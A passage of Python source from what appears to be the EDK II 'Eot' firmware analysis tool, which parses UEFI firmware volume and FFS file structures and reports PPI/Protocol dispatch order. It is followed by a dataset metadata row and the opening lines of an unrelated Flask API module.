self.extend(self._BUF_[self._OFF_ : self._OFF_ + Size])
else:
# keep header in this Image object
self.extend(self._BUF_[self._OFF_ : self._OFF_ + self._HEADER_SIZE_])
#
# use new Image object to represent payload, which may be another kind
# of image such as PE32
#
PayloadOffset = self._HEADER_SIZE_
PayloadLen = self.Size - self._HEADER_SIZE_
Payload = self._SectionSubImages[self.Type]()
Payload.frombuffer(self._BUF_, self._OFF_ + self._HEADER_SIZE_, PayloadLen)
self._SubImages[PayloadOffset] = Payload
return Size
def _SetSize(self, Size):
Size1 = Size & 0xFF
Size2 = (Size & 0xFF00) >> 8
Size3 = (Size & 0xFF0000) >> 16
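        # e.g. Size = 0x012345 is stored as the little-endian 3-byte field
        # Size1 = 0x45, Size2 = 0x23, Size3 = 0x01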
self.SetField(self._SIZE_, 0, Size1, Size2, Size3)
def _GetSize(self):
Size1, Size2, Size3 = self.GetField(self._SIZE_)
return Size1 + (Size2 << 8) + (Size3 << 16)
def _SetType(self, Type):
self.SetField(self._TYPE_, 0, Type)
def _GetType(self):
return self.GetField(self._TYPE_)[0]
def _GetAlignment(self):
return self._Alignment
def _SetAlignment(self, Alignment):
self._Alignment = Alignment
AlignmentMask = Alignment - 1
# section alignment is actually for payload, so we need to add header size
PayloadOffset = self._OFF_ + self._HEADER_SIZE_
if (PayloadOffset & (~AlignmentMask)) == 0:
return
NewOffset = (PayloadOffset + AlignmentMask) & (~AlignmentMask)
while (NewOffset - PayloadOffset) < self._HEADER_SIZE_:
NewOffset += self._Alignment
def tofile(self, f):
self.Size = len(self)
Image.tofile(self, f)
for Offset in self._SubImages:
self._SubImages[Offset].tofile(f)
Type = property(_GetType, _SetType)
Size = property(_GetSize, _SetSize)
Alignment = property(_GetAlignment, _SetAlignment)
## Ffs() class
#
# A class for Ffs Section
#
class Ffs(Image):
_FfsFormat = "24B%(payload_size)sB"
# skip IntegrityCheck
_HEADER_ = struct.Struct("1I2H8B 2x 1B 1B 3B 1B")
_HEADER_SIZE_ = _HEADER_.size
_NAME_ = struct.Struct("1I2H8B")
_INT_CHECK_ = struct.Struct("16x 1H")
_TYPE_ = struct.Struct("18x 1B")
_ATTR_ = struct.Struct("19x 1B")
_SIZE_ = struct.Struct("20x 3B")
_STATE_ = struct.Struct("23x 1B")
VTF_GUID = "1BA0062E-C779-4582-8566-336AE8F78F09"
FFS_ATTRIB_FIXED = 0x04
FFS_ATTRIB_DATA_ALIGNMENT = 0x38
FFS_ATTRIB_CHECKSUM = 0x40
_TypeName = {
0x00 : "<unknown>",
0x01 : "RAW",
0x02 : "FREEFORM",
0x03 : "SECURITY_CORE",
0x04 : "PEI_CORE",
0x05 : "DXE_CORE",
0x06 : "PEIM",
0x07 : "DRIVER",
0x08 : "COMBINED_PEIM_DRIVER",
0x09 : "APPLICATION",
0x0A : "SMM",
0x0B : "FIRMWARE_VOLUME_IMAGE",
0x0C : "COMBINED_SMM_DXE",
0x0D : "SMM_CORE",
0x0E : "MM_STANDALONE",
0x0F : "MM_CORE_STANDALONE",
0xc0 : "OEM_MIN",
0xdf : "OEM_MAX",
0xe0 : "DEBUG_MIN",
0xef : "DEBUG_MAX",
0xf0 : "FFS_MIN",
0xff : "FFS_MAX",
0xf0 : "FFS_PAD",
}
def __init__(self):
Image.__init__(self)
self.FreeSpace = 0
self.Sections = sdict()
self.Depex = ''
self.__ID__ = None
def __str__(self):
global gIndention
gIndention += 4
Indention = ' ' * gIndention
FfsInfo = Indention
FfsInfo += "[FFS:%s] offset=%x size=%x guid=%s free_space=%x alignment=%s\n" % \
(Ffs._TypeName[self.Type], self._OFF_, self.Size, self.Guid, self.FreeSpace, self.Alignment)
SectionInfo = '\n'.join([str(self.Sections[Offset]) for Offset in self.Sections.keys()])
gIndention -= 4
return FfsInfo + SectionInfo + "\n"
def __len__(self):
return self.Size
def __repr__(self):
return self.__ID__
def _Unpack(self):
Size1, Size2, Size3 = self._SIZE_.unpack_from(self._BUF_, self._OFF_)
Size = Size1 + (Size2 << 8) + (Size3 << 16)
self.empty()
self.extend(self._BUF_[self._OFF_ : self._OFF_ + Size])
# Pad FFS may use the same GUID. We need to avoid it.
if self.Type == 0xf0:
self.__ID__ = str(uuid.uuid1()).upper()
else:
self.__ID__ = self.Guid
# Traverse the SECTION. RAW and PAD do not have sections
if self.Type not in [0xf0, 0x01] and Size > 0 and Size < 0xFFFFFF:
EndOfFfs = Size
SectionStartAddress = self._HEADER_SIZE_
while SectionStartAddress < EndOfFfs:
SectionObj = Section()
SectionObj.frombuffer(self, SectionStartAddress)
#f = open(repr(SectionObj), 'wb')
#SectionObj.Size = 0
#SectionObj.tofile(f)
#f.close()
self.Sections[SectionStartAddress] = SectionObj
SectionStartAddress += len(SectionObj)
SectionStartAddress = (SectionStartAddress + 3) & (~3)
def Pack(self):
pass
def SetFreeSpace(self, Size):
self.FreeSpace = Size
def _GetGuid(self):
return gGuidStringFormat % self.Name
def _SetName(self, Value):
# Guid1, Guid2, Guid3, Guid4, Guid5, Guid6, Guid7, Guid8, Guid9, Guid10, Guid11
self.SetField(self._NAME_, 0, Value)
def _GetName(self):
# Guid1, Guid2, Guid3, Guid4, Guid5, Guid6, Guid7, Guid8, Guid9, Guid10, Guid11
return self.GetField(self._NAME_)
def _SetSize(self, Size):
Size1 = Size & 0xFF
Size2 = (Size & 0xFF00) >> 8
Size3 = (Size & 0xFF0000) >> 16
self.SetField(self._SIZE_, 0, Size1, Size2, Size3)
def _GetSize(self):
Size1, Size2, Size3 = self.GetField(self._SIZE_)
return Size1 + (Size2 << 8) + (Size3 << 16)
def _SetType(self, Type):
self.SetField(self._TYPE_, 0, Type)
def _GetType(self):
return self.GetField(self._TYPE_)[0]
def _SetAttributes(self, Value):
self.SetField(self._ATTR_, 0, Value)
def _GetAttributes(self):
return self.GetField(self._ATTR_)[0]
def _GetFixed(self):
if (self.Attributes & self.FFS_ATTRIB_FIXED) != 0:
return True
return False
def _GetCheckSum(self):
if (self.Attributes & self.FFS_ATTRIB_CHECKSUM) != 0:
return True
return False
def _GetAlignment(self):
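        # FFS_ATTRIB_DATA_ALIGNMENT (0x38) masks bits 3-5 of the attributes byte, so
        # this returns the 0-7 alignment code rather than an alignment in bytes.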
return (self.Attributes & self.FFS_ATTRIB_DATA_ALIGNMENT) >> 3
def _SetState(self, Value):
self.SetField(self._STATE_, 0, Value)
def _GetState(self):
return self.GetField(self._STATE_)[0]
Name = property(_GetName, _SetName)
Guid = property(_GetGuid)
Type = property(_GetType, _SetType)
Size = property(_GetSize, _SetSize)
Attributes = property(_GetAttributes, _SetAttributes)
Fixed = property(_GetFixed)
Checksum = property(_GetCheckSum)
Alignment = property(_GetAlignment)
State = property(_GetState, _SetState)
## MultipleFv() class
#
# A class for Multiple FV
#
class MultipleFv(FirmwareVolume):
def __init__(self, FvList):
FirmwareVolume.__init__(self)
self.BasicInfo = []
for FvPath in FvList:
Fd = None
FvName = os.path.splitext(os.path.split(FvPath)[1])[0]
if FvPath.strip():
Fd = open(FvPath, 'rb')
Buf = array('B')
try:
Buf.fromfile(Fd, os.path.getsize(FvPath))
except EOFError:
pass
Fv = FirmwareVolume(FvName)
Fv.frombuffer(Buf, 0, len(Buf))
self.BasicInfo.append([Fv.Name, Fv.FileSystemGuid, Fv.Size])
self.FfsDict.append(Fv.FfsDict)
## Class Eot
#
# This class is used to define Eot main entrance
#
# @param object: Inherited from object class
#
class Eot(object):
## The constructor
#
# @param self: The object pointer
#
def __init__(self, CommandLineOption=True, IsInit=True, SourceFileList=None, \
IncludeDirList=None, DecFileList=None, GuidList=None, LogFile=None,
FvFileList="", MapFileList="", Report='Report.html', Dispatch=None):
# Version and Copyright
self.VersionNumber = ("0.02" + " " + gBUILD_VERSION)
self.Version = "%prog Version " + self.VersionNumber
self.Copyright = "Copyright (c) 2008 - 2018, Intel Corporation All rights reserved."
self.Report = Report
self.IsInit = IsInit
self.SourceFileList = SourceFileList
self.IncludeDirList = IncludeDirList
self.DecFileList = DecFileList
self.GuidList = GuidList
self.LogFile = LogFile
self.FvFileList = FvFileList
self.MapFileList = MapFileList
self.Dispatch = Dispatch
# Check workspace environment
if "EFI_SOURCE" not in os.environ:
if "EDK_SOURCE" not in os.environ:
pass
else:
EotGlobalData.gEDK_SOURCE = os.path.normpath(os.getenv("EDK_SOURCE"))
else:
EotGlobalData.gEFI_SOURCE = os.path.normpath(os.getenv("EFI_SOURCE"))
EotGlobalData.gEDK_SOURCE = os.path.join(EotGlobalData.gEFI_SOURCE, 'Edk')
if "WORKSPACE" not in os.environ:
EdkLogger.error("EOT", BuildToolError.ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
else:
EotGlobalData.gWORKSPACE = os.path.normpath(os.getenv("WORKSPACE"))
EotGlobalData.gMACRO['WORKSPACE'] = EotGlobalData.gWORKSPACE
EotGlobalData.gMACRO['EFI_SOURCE'] = EotGlobalData.gEFI_SOURCE
EotGlobalData.gMACRO['EDK_SOURCE'] = EotGlobalData.gEDK_SOURCE
# Parse the options and args
if CommandLineOption:
self.ParseOption()
if self.FvFileList:
for FvFile in GetSplitValueList(self.FvFileList, ' '):
FvFile = os.path.normpath(FvFile)
if not os.path.isfile(FvFile):
EdkLogger.error("Eot", EdkLogger.EOT_ERROR, "Can not find file %s " % FvFile)
EotGlobalData.gFV_FILE.append(FvFile)
else:
EdkLogger.error("Eot", EdkLogger.EOT_ERROR, "The fv file list of target platform was not specified")
if self.MapFileList:
for MapFile in GetSplitValueList(self.MapFileList, ' '):
MapFile = os.path.normpath(MapFile)
if not os.path.isfile(MapFile):
EdkLogger.error("Eot", EdkLogger.EOT_ERROR, "Can not find file %s " % MapFile)
EotGlobalData.gMAP_FILE.append(MapFile)
# Generate source file list
self.GenerateSourceFileList(self.SourceFileList, self.IncludeDirList)
# Generate guid list of dec file list
self.ParseDecFile(self.DecFileList)
# Generate guid list from GUID list file
self.ParseGuidList(self.GuidList)
# Init Eot database
EotGlobalData.gDb = Database.Database(Database.DATABASE_PATH)
EotGlobalData.gDb.InitDatabase(self.IsInit)
# Build ECC database
self.BuildDatabase()
# Parse Ppi/Protocol
self.ParseExecutionOrder()
# Merge Identifier tables
self.GenerateQueryTable()
# Generate report database
self.GenerateReportDatabase()
# Load Fv Info
self.LoadFvInfo()
# Load Map Info
self.LoadMapInfo()
# Generate Report
self.GenerateReport()
# Convert log file
self.ConvertLogFile(self.LogFile)
# DONE
EdkLogger.quiet("EOT FINISHED!")
# Close Database
EotGlobalData.gDb.Close()
## ParseDecFile() method
#
# parse DEC file and get all GUID names with GUID values as {GuidName : GuidValue}
# The Dict is stored in EotGlobalData.gGuidDict
#
# @param self: The object pointer
# @param DecFileList: A list of all DEC files
#
def ParseDecFile(self, DecFileList):
if DecFileList:
path = os.path.normpath(DecFileList)
lfr = open(path, 'rb')
for line in lfr:
path = os.path.normpath(os.path.join(EotGlobalData.gWORKSPACE, line.strip()))
if os.path.exists(path):
dfr = open(path, 'rb')
for line in dfr:
line = CleanString(line)
list = line.split('=')
if len(list) == 2:
EotGlobalData.gGuidDict[list[0].strip()] = GuidStructureStringToGuidString(list[1].strip())
## ParseGuidList() method
#
# Parse Guid list and get all GUID names with GUID values as {GuidName : GuidValue}
# The Dict is stored in EotGlobalData.gGuidDict
#
# @param self: The object pointer
# @param GuidList: A list of all GUID and its value
#
def ParseGuidList(self, GuidList):
Path = os.path.join(EotGlobalData.gWORKSPACE, GuidList)
if os.path.isfile(Path):
for Line in open(Path):
if Line.strip():
(GuidName, GuidValue) = Line.split()
EotGlobalData.gGuidDict[GuidName] = GuidValue
## ConvertLogFile() method
#
# Parse a real running log file to get real dispatch order
# The result is saved to old file name + '.new'
#
# @param self: The object pointer
# @param LogFile: A real running log file name
#
def ConvertLogFile(self, LogFile):
newline = []
lfr = None
lfw = None
if LogFile:
lfr = open(LogFile, 'rb')
lfw = open(LogFile + '.new', 'wb')
for line in lfr:
line = line.strip()
line = line.replace('.efi', '')
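                # The fixed offsets below (55 and 57) are assumed to skip the loader
                # prefix and load address in the log line, leaving only the module name.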
index = line.find("Loading PEIM at ")
if index > -1:
newline.append(line[index + 55 : ])
continue
index = line.find("Loading driver at ")
if index > -1:
newline.append(line[index + 57 : ])
continue
for line in newline:
lfw.write(line + '\r\n')
if lfr:
lfr.close()
if lfw:
lfw.close()
## GenerateSourceFileList() method
#
# Generate a list of all source files
# 1. Search the file list one by one
# 2. Store inf file name with source file names under it like
# { INF file name: [source file1, source file2, ...]}
# 3. Search the include list to find all .h files
# 4. Store source file list to EotGlobalData.gSOURCE_FILES
# 5. Store INF file list to EotGlobalData.gINF_FILES
#
# @param self: The object pointer
# @param SourceFileList: A list of all source files
# @param IncludeFileList: A list of all include files
#
def GenerateSourceFileList(self, SourceFileList, IncludeFileList):
EdkLogger.quiet("Generating source files list ... ")
mSourceFileList = []
mInfFileList = []
mDecFileList = []
mFileList = {}
mCurrentInfFile = ''
mCurrentSourceFileList = []
if SourceFileList:
sfl = open(SourceFileList, 'r')
for line in sfl:
line = os.path.normpath(os.path.join(EotGlobalData.gWORKSPACE, line.strip()))
if line[-2:].upper() == '.C' or line[-2:].upper() == '.H':
if line not in mCurrentSourceFileList:
mCurrentSourceFileList.append(line)
mSourceFileList.append(line)
EotGlobalData.gOP_SOURCE_FILES.write('%s\n' % line)
if line[-4:].upper() == '.INF':
if mCurrentInfFile != '':
mFileList[mCurrentInfFile] = mCurrentSourceFileList
mCurrentSourceFileList = []
mCurrentInfFile = os.path.normpath(os.path.join(EotGlobalData.gWORKSPACE, line))
EotGlobalData.gOP_INF.write('%s\n' % mCurrentInfFile)
if mCurrentInfFile not in mFileList:
mFileList[mCurrentInfFile] = mCurrentSourceFileList
# Get all include files from packages
if IncludeFileList:
ifl = open(IncludeFileList, 'rb')
for line in ifl:
if not line.strip():
continue
newline = os.path.normpath(os.path.join(EotGlobalData.gWORKSPACE, line.strip()))
for Root, Dirs, Files in os.walk(str(newline)):
for File in Files:
FullPath = os.path.normpath(os.path.join(Root, File))
if FullPath not in mSourceFileList and File[-2:].upper() == '.H':
mSourceFileList.append(FullPath)
EotGlobalData.gOP_SOURCE_FILES.write('%s\n' % FullPath)
if FullPath not in mDecFileList and File.upper().find('.DEC') > -1:
mDecFileList.append(FullPath)
EotGlobalData.gSOURCE_FILES = mSourceFileList
EotGlobalData.gOP_SOURCE_FILES.close()
EotGlobalData.gINF_FILES = mFileList
EotGlobalData.gOP_INF.close()
## GenerateReport() method
#
# Generate final HTML report
#
# @param self: The object pointer
#
def GenerateReport(self):
EdkLogger.quiet("Generating report file ... ")
Rep = Report(self.Report, EotGlobalData.gFV, self.Dispatch)
Rep.GenerateReport()
## LoadMapInfo() method
#
# Load map files and parse them
#
# @param self: The object pointer
#
def LoadMapInfo(self):
if EotGlobalData.gMAP_FILE != []:
EdkLogger.quiet("Parsing Map file ... ")
EotGlobalData.gMap = ParseMapFile(EotGlobalData.gMAP_FILE)
## LoadFvInfo() method
#
# Load FV binary files and parse them
#
# @param self: The object pointer
#
def LoadFvInfo(self):
EdkLogger.quiet("Parsing FV file ... ")
EotGlobalData.gFV = MultipleFv(EotGlobalData.gFV_FILE)
EotGlobalData.gFV.Dispatch(EotGlobalData.gDb)
for Protocol in EotGlobalData.gProtocolList:
EotGlobalData.gOP_UN_MATCHED_IN_LIBRARY_CALLING.write('%s\n' %Protocol)
## GenerateReportDatabase() method
#
# Generate data for the information needed by report
# 1. Update name, macro and value of all found PPI/PROTOCOL GUID
# 2. Install hard coded PPI/PROTOCOL
#
# @param self: The object pointer
#
def GenerateReportDatabase(self):
EdkLogger.quiet("Generating the cross-reference table of GUID for Ppi/Protocol ... ")
# Update Protocol/Ppi Guid
SqlCommand = """select DISTINCT GuidName from Report"""
RecordSet = EotGlobalData.gDb.TblReport.Exec(SqlCommand)
for Record in RecordSet:
GuidName = Record[0]
GuidMacro = ''
GuidMacro2 = ''
GuidValue = ''
# Find guid value defined in Dec file
if GuidName in EotGlobalData.gGuidDict:
GuidValue = EotGlobalData.gGuidDict[GuidName]
SqlCommand = """update Report set GuidMacro = '%s', GuidValue = '%s' where GuidName = '%s'""" %(GuidMacro, GuidValue, GuidName)
EotGlobalData.gDb.TblReport.Exec(SqlCommand)
continue
# Search defined Macros for guid name
SqlCommand ="""select DISTINCT Value, Modifier from Query where Name like '%s'""" % GuidName
GuidMacroSet = EotGlobalData.gDb.TblReport.Exec(SqlCommand)
# Ignore NULL result
if not GuidMacroSet:
continue
GuidMacro = GuidMacroSet[0][0].strip()
if not GuidMacro:
continue
# Find Guid value of Guid Macro
SqlCommand ="""select DISTINCT Value from Query2 where Value like '%%%s%%' and Model = %s""" % (GuidMacro, MODEL_IDENTIFIER_MACRO_DEFINE)
GuidValueSet = EotGlobalData.gDb.TblReport.Exec(SqlCommand)
if GuidValueSet != []:
GuidValue = GuidValueSet[0][0]
GuidValue = GuidValue[GuidValue.find(GuidMacro) + len(GuidMacro) :]
GuidValue = GuidValue.lower().replace('\\', '').replace('\r', '').replace('\n', '').replace('l', '').strip()
GuidValue = GuidStructureStringToGuidString(GuidValue)
SqlCommand = """update Report set GuidMacro = '%s', GuidValue = '%s' where GuidName = '%s'""" %(GuidMacro, GuidValue, GuidName)
EotGlobalData.gDb.TblReport.Exec(SqlCommand)
continue
# Update Hard Coded Ppi/Protocol
SqlCommand = """select DISTINCT GuidValue, ItemType from Report where ModuleID = -2 and ItemMode = 'Produced'"""
RecordSet = EotGlobalData.gDb.TblReport.Exec(SqlCommand)
for Record in RecordSet:
if Record[1] == 'Ppi':
EotGlobalData.gPpiList[Record[0].lower()] = -2
if Record[1] == 'Protocol':
EotGlobalData.gProtocolList[Record[0].lower()] = -2
## GenerateQueryTable() method
#
    # Generate two tables to improve query performance
#
# @param self: The object pointer
#
def GenerateQueryTable(self):
EdkLogger.quiet("Generating temp query table for analysis ... ")
for Identifier in EotGlobalData.gIdentifierTableList:
SqlCommand = """insert into Query (Name, Modifier, Value, Model)
select Name, Modifier, Value, Model from %s where (Model = %s or Model = %s)""" \
% (Identifier[0], MODEL_IDENTIFIER_VARIABLE, MODEL_IDENTIFIER_ASSIGNMENT_EXPRESSION)
EotGlobalData.gDb.TblReport.Exec(SqlCommand)
SqlCommand = """insert into Query2 (Name, Modifier, Value, Model)
select Name, Modifier, Value, Model from %s where Model = %s""" \
% (Identifier[0], MODEL_IDENTIFIER_MACRO_DEFINE)
EotGlobalData.gDb.TblReport.Exec(SqlCommand)
## ParseExecutionOrder() method
#
# Get final execution order
# 1. Search all PPI
# 2. Search all PROTOCOL
#
# @param self: The object pointer
#
def ParseExecutionOrder(self):
EdkLogger.quiet("Searching Ppi/Protocol ... ")
for Identifier in EotGlobalData.gIdentifierTableList:
ModuleID, ModuleName, ModuleGuid, SourceFileID, SourceFileFullPath, ItemName, ItemType, ItemMode, GuidName, GuidMacro, GuidValue, BelongsToFunction, Enabled = \
-1, '', '', -1, '', '', '', '', '', '', '', '', 0
SourceFileID = Identifier[0].replace('Identifier', '')
SourceFileFullPath = Identifier[1]
Identifier = Identifier[0]
# Find Ppis
ItemMode = 'Produced'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.InstallPpi', '->InstallPpi', 'PeiInstallPpi', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchPpi(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode)
ItemMode = 'Produced'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.ReInstallPpi', '->ReInstallPpi', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchPpi(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 2)
SearchPpiCallFunction(Identifier, SourceFileID, SourceFileFullPath, ItemMode)
ItemMode = 'Consumed'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.LocatePpi', '->LocatePpi', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchPpi(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode)
SearchFunctionCalling(Identifier, SourceFileID, SourceFileFullPath, 'Ppi', ItemMode)
ItemMode = 'Callback'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.NotifyPpi', '->NotifyPpi', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchPpi(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode)
            # Find Protocols
ItemMode = 'Produced'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%' or Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.InstallProtocolInterface', '.ReInstallProtocolInterface', '->InstallProtocolInterface', '->ReInstallProtocolInterface', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchProtocols(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 1)
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.InstallMultipleProtocolInterfaces', '->InstallMultipleProtocolInterfaces', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchProtocols(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 2)
SearchFunctionCalling(Identifier, SourceFileID, SourceFileFullPath, 'Protocol', ItemMode)
ItemMode = 'Consumed'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.LocateProtocol', '->LocateProtocol', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchProtocols(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 0)
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.HandleProtocol', '->HandleProtocol', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchProtocols(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 1)
SearchFunctionCalling(Identifier, SourceFileID, SourceFileFullPath, 'Protocol', ItemMode)
ItemMode = 'Callback'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.RegisterProtocolNotify', '->RegisterProtocolNotify', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchProtocols(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 0)
SearchFunctionCalling(Identifier, SourceFileID, SourceFileFullPath, 'Protocol', ItemMode)
# Hard Code
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gEfiSecPlatformInformationPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gEfiNtLoadAsDllPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gNtPeiLoadFileGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gPeiNtAutoScanPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gNtFwhPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gPeiNtThunkPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gPeiPlatformTypePpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gPeiFrequencySelectionCpuPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gPeiCachePpiGuid', '', '', '', 0)
EotGlobalData.gDb.Conn.commit()
    ## BuildDatabase() method
#
# Build the database for target
#
# @param self: The object pointer
#
def BuildDatabase(self):
# Clean report table
EotGlobalData.gDb.TblReport.Drop()
EotGlobalData.gDb.TblReport.Create()
# Build database
if self.IsInit:
self.BuildMetaDataFileDatabase(EotGlobalData.gINF_FILES)
EdkLogger.quiet("Building database for source code ...")
c.CreateCCodeDB(EotGlobalData.gSOURCE_FILES)
EdkLogger.quiet("Building database for source code done!")
EotGlobalData.gIdentifierTableList = GetTableList((MODEL_FILE_C, MODEL_FILE_H), 'Identifier', EotGlobalData.gDb)
## BuildMetaDataFileDatabase() method
#
# Build the database for meta data files
#
# @param self: The object pointer
# @param Inf_Files: A list for all INF files
#
def BuildMetaDataFileDatabase(self, Inf_Files):
EdkLogger.quiet("Building database for meta data files ...")
for InfFile in Inf_Files:
if not InfFile:
continue
EdkLogger.quiet("Parsing %s ..." % str(InfFile))
EdkInfParser(InfFile, EotGlobalData.gDb, Inf_Files[InfFile], '')
EotGlobalData.gDb.Conn.commit()
EdkLogger.quiet("Building database for meta data files done!")
## ParseOption() method
#
# Parse command line options
#
# @param self: The object pointer
#
def ParseOption(self):
(Options, Target) = self.EotOptionParser()
# Set log level
self.SetLogLevel(Options)
if Options.FvFileList:
self.FvFileList = Options.FvFileList
if Options.MapFileList:
            self.MapFileList = Options.MapFileList
if Options.SourceFileList:
self.SourceFileList = Options.SourceFileList
if Options.IncludeDirList:
self.IncludeDirList = Options.IncludeDirList
if Options.DecFileList:
self.DecFileList = Options.DecFileList
if Options.GuidList:
self.GuidList = Options.GuidList
if Options.LogFile:
self.LogFile = Options.LogFile
if Options.keepdatabase:
self.IsInit = False
## SetLogLevel() method
#
# Set current log level of the tool based on args
#
# @param self: The object pointer
# @param Option: The option list including log level setting
#
def SetLogLevel(self, Option):
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
## EotOptionParser() method
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @param self: The object pointer
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def EotOptionParser(self):
Parser = OptionParser(description = self.Copyright, version = self.Version, prog = "Eot.exe", usage = "%prog [options]")
Parser.add_option("-m", "--makefile filename", action="store", type="string", dest='MakeFile',
help="Specify a makefile for the platform.")
Parser.add_option("-c", "--dsc filename", action="store", type="string", dest="DscFile",
help="Specify a dsc file for the platform.")
Parser.add_option("-f", "--fv filename", action="store", type="string", dest="FvFileList",
help="Specify fv file list, quoted by \"\".")
Parser.add_option("-a", "--map filename", action="store", type="string", dest="MapFileList",
help="Specify map file list, quoted by \"\".")
Parser.add_option("-s", "--source files", action="store", type="string", dest="SourceFileList",
help="Specify source file list by a file")
Parser.add_option("-i", "--include dirs", action="store", type="string", dest="IncludeDirList",
help="Specify include dir list by a file")
Parser.add_option("-e", "--dec files", action="store", type="string", dest="DecFileList",
help="Specify dec file list by a file")
Parser.add_option("-g", "--guid list", action="store", type="string", dest="GuidList",
help="Specify guid file list by a file")
Parser.add_option("-l", "--log filename", action="store", type="string", dest="LogFile",
help="Specify real execution log file")
Parser.add_option("-k", "--keepdatabase", action="store_true", type=None, help="The existing Eot database will not be cleaned except report information if this option is specified.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
(Opt, Args)=Parser.parse_args()
return (Opt, Args)
##
#
# This acts like the main() function for the script, unless it is 'import'ed into another
# script.
#
if __name__ == '__main__':
# Initialize log system
EdkLogger.Initialize()
EdkLogger.IsRaiseError = False
EdkLogger.quiet(time.strftime("%H:%M:%S, %b.%d %Y ", time.localtime()) + "[00:00]" + "\n")
StartTime = time.clock()
Eot = Eot(CommandLineOption=False,
SourceFileList=r'C:\TestEot\Source.txt',
GuidList=r'C:\TestEot\Guid.txt',
FvFileList=r'C:\TestEot\FVRECOVERY.Fv')
FinishTime = time.clock()
BuildDuration = time.strftime("%M:%S", time.gmtime(int(round(FinishTime - StartTime))))
EdkLogger.quiet("\n%s [%s]" % (time.strftime("%H:%M:%S, %b.%d %Y", time.localtime()), BuildDuration))
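    # Illustrative command lines (not part of the original source); the file
    # names are hypothetical placeholders showing how the options defined in
    # EotOptionParser() above combine in practice:
    #
    #   Eot.exe -f "FVRECOVERY.Fv" -s SourceList.txt -g GuidList.txt -l Eot.log
    #   Eot.exe -m Makefile -c Platform.dsc -v
    #
    # The hard-coded invocation above bypasses the parser entirely by passing
    # CommandLineOption=False and supplying the same inputs as keyword arguments.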
|
bsd-2-clause
| -5,653,460,506,086,089,000 | 38.241279 | 199 | 0.54166 | false |
makerhanoi/tagio
|
tagio/views/api/__init__.py
|
1
|
1249
|
"""API."""
from flask import Blueprint, jsonify, request
from tagio.models.user import User
from tagio.extensions import csrf_protect
from . import user
__all__ = ('user',)
blueprint = Blueprint('api',
__name__,
